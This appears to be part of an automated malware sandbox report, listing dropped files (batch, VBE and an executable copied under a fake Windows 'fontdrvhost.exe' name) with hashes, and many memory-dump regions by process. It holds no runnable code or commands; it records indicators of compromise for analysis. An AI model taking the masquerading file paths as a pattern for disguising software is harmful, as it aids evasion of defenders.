C:\Users\Admin\AppData\Local\Temp\xc1v93Hoh1.bat
Filesize
201B

MD5
706f26f95b32d905a31ee07876743969

SHA1
3716045cdbe6c3bf26bbe38617b0b5135dc807df

SHA256
49a4680fd1d39b7746cd1c376d96bb92bde23389a2bec5157567d9651d384e94

SHA512
25b823e051b47f4ecae85ee1312b824b86c34a37192486373675a29bd43d44471d92ab82371277d15a779351c4d766ee3537058ebea7eaf9044ba080ee33968a

Download Submit
C:\Users\Admin\AppData\Local\Temp\yTtrehocny.bat
Filesize
201B

MD5
b72aa53864d67f98bef71b727a71710d

SHA1
69042f9313119b52df366d073ff24dd9fad8c94a

SHA256
4796e67ee0710979c646b98371889e9bccd9612bbbb10e2c4d96a6c8e2f9534a

SHA512
527a87fe2cefa52d0b95896659c5d4436c8bbe1a43da361c978ff948e3735663d828ab641f47ea1963c1154f46edc540edeffa38092f41e20312a8136b49afa5

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\Windows\IME\it-IT\fontdrvhost.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\1zu9dW.bat
Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\DllCommonsvc.exe
Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/60-911-0x0000000000000000-mapping.dmp

Download
memory/676-900-0x0000000000000000-mapping.dmp

Download
memory/676-286-0x0000000000000000-mapping.dmp

Download
memory/676-902-0x0000000000E30000-0x0000000000E42000-memory.dmp

Filesize
72KB

Download
memory/1808-892-0x0000000000000000-mapping.dmp

Download
memory/1852-287-0x0000000000000000-mapping.dmp

Download
memory/1980-308-0x0000000000000000-mapping.dmp

Download
memory/2060-288-0x0000000000000000-mapping.dmp

Download
memory/2140-888-0x0000000000000000-mapping.dmp

Download
memory/2156-906-0x0000000000000000-mapping.dmp

Download
memory/2216-291-0x0000000000000000-mapping.dmp

Download
memory/2216-369-0x000001924F3C0000-0x000001924F3E2000-memory.dmp

Filesize
136KB

Download
memory/2216-372-0x0000019267850000-0x00000192678C6000-memory.dmp

Filesize
472KB

Download
memory/2368-320-0x0000000000000000-mapping.dmp

Download
memory/2488-894-0x0000000000000000-mapping.dmp

Download
memory/2640-304-0x0000000000000000-mapping.dmp

Download
memory/2692-161-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-164-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-116-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-117-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-178-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-177-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-118-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-120-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-176-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-175-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-121-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-123-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-140-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-124-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-142-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-174-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-173-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-172-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-171-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-125-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-139-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-126-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-138-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-170-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-127-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-143-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-169-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-128-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-168-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-129-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-130-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-137-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-167-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-166-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-165-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-141-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-132-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-136-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-163-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-131-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-162-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-115-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-160-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-159-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-158-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-157-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-156-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-155-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-154-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-153-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-152-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-151-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-150-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-149-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-147-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-133-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-148-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-146-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-134-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-145-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-135-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2692-144-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/2716-293-0x0000000000000000-mapping.dmp

Download
memory/2740-465-0x0000000000000000-mapping.dmp

Download
memory/2796-289-0x0000000000000000-mapping.dmp

Download
memory/2956-899-0x0000000000000000-mapping.dmp

Download
memory/3056-298-0x0000000000000000-mapping.dmp

Download
memory/3116-882-0x0000000000000000-mapping.dmp

Download
memory/3508-903-0x0000000000000000-mapping.dmp

Download
memory/3656-905-0x0000000000000000-mapping.dmp

Download
memory/3692-294-0x0000000000000000-mapping.dmp

Download
memory/3744-290-0x0000000000000000-mapping.dmp

Download
memory/3784-285-0x000000001AC10000-0x000000001AC1C000-memory.dmp

Filesize
48KB

Download
memory/3784-283-0x000000001ABC0000-0x000000001ABCC000-memory.dmp

Filesize
48KB

Download
memory/3784-282-0x0000000000880000-0x0000000000892000-memory.dmp

Filesize
72KB

Download
memory/3784-284-0x000000001ABE0000-0x000000001ABEC000-memory.dmp

Filesize
48KB

Download
memory/3784-278-0x0000000000000000-mapping.dmp

Download
memory/3784-281-0x0000000000060000-0x0000000000170000-memory.dmp

Filesize
1.1MB

Download
memory/3824-292-0x0000000000000000-mapping.dmp

Download
memory/4052-315-0x0000000000000000-mapping.dmp

Download
memory/4076-886-0x0000000000000000-mapping.dmp

Download
memory/4180-880-0x0000000000000000-mapping.dmp

Download
memory/4220-255-0x0000000000000000-mapping.dmp

Download
memory/4340-342-0x0000000000000000-mapping.dmp

Download
memory/4340-373-0x0000000002990000-0x00000000029A2000-memory.dmp

Filesize
72KB

Download
memory/4420-913-0x0000000000000000-mapping.dmp

Download
memory/4656-915-0x0000000000000000-mapping.dmp

Download
memory/4720-885-0x0000000000A80000-0x0000000000A92000-memory.dmp

Filesize
72KB

Download
memory/4720-883-0x0000000000000000-mapping.dmp

Download
memory/4728-897-0x0000000000000000-mapping.dmp

Download
memory/4740-297-0x0000000000000000-mapping.dmp

Download
memory/4792-889-0x0000000000000000-mapping.dmp

Download
memory/4792-891-0x00000000011C0000-0x00000000011D2000-memory.dmp

Filesize
72KB

Download
memory/4820-313-0x0000000000000000-mapping.dmp

Download
memory/4836-180-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/4836-181-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/4836-179-0x0000000000000000-mapping.dmp

Download
memory/5060-604-0x0000000000000000-mapping.dmp

Download
memory/5104-908-0x0000000000000000-mapping.dmp

Download
memory/5280-895-0x0000000000000000-mapping.dmp

Download
memory/5332-910-0x0000000000000000-mapping.dmp

Download
memory/5380-853-0x0000000000000000-mapping.dmp

Download
memory/5488-857-0x0000000000000000-mapping.dmp

Download
memory/5544-859-0x0000000000000000-mapping.dmp

Download
memory/5564-862-0x0000000000940000-0x0000000000952000-memory.dmp

Filesize
72KB

Download
memory/5564-860-0x0000000000000000-mapping.dmp

Download
memory/5668-863-0x0000000000000000-mapping.dmp

Download
memory/5724-865-0x0000000000000000-mapping.dmp

Download
memory/5748-868-0x00000000028D0000-0x00000000028E2000-memory.dmp

Filesize
72KB

Download
memory/5748-866-0x0000000000000000-mapping.dmp

Download
memory/5852-869-0x0000000000000000-mapping.dmp

Download
memory/5908-871-0x0000000000000000-mapping.dmp

Download
memory/5928-874-0x00000000025E0000-0x00000000025F2000-memory.dmp

Filesize
72KB

Download
memory/5928-872-0x0000000000000000-mapping.dmp

Download
memory/6032-875-0x0000000000000000-mapping.dmp

Download
memory/6088-877-0x0000000000000000-mapping.dmp

Download
memory/6108-878-0x0000000000000000-mapping.dmp

Download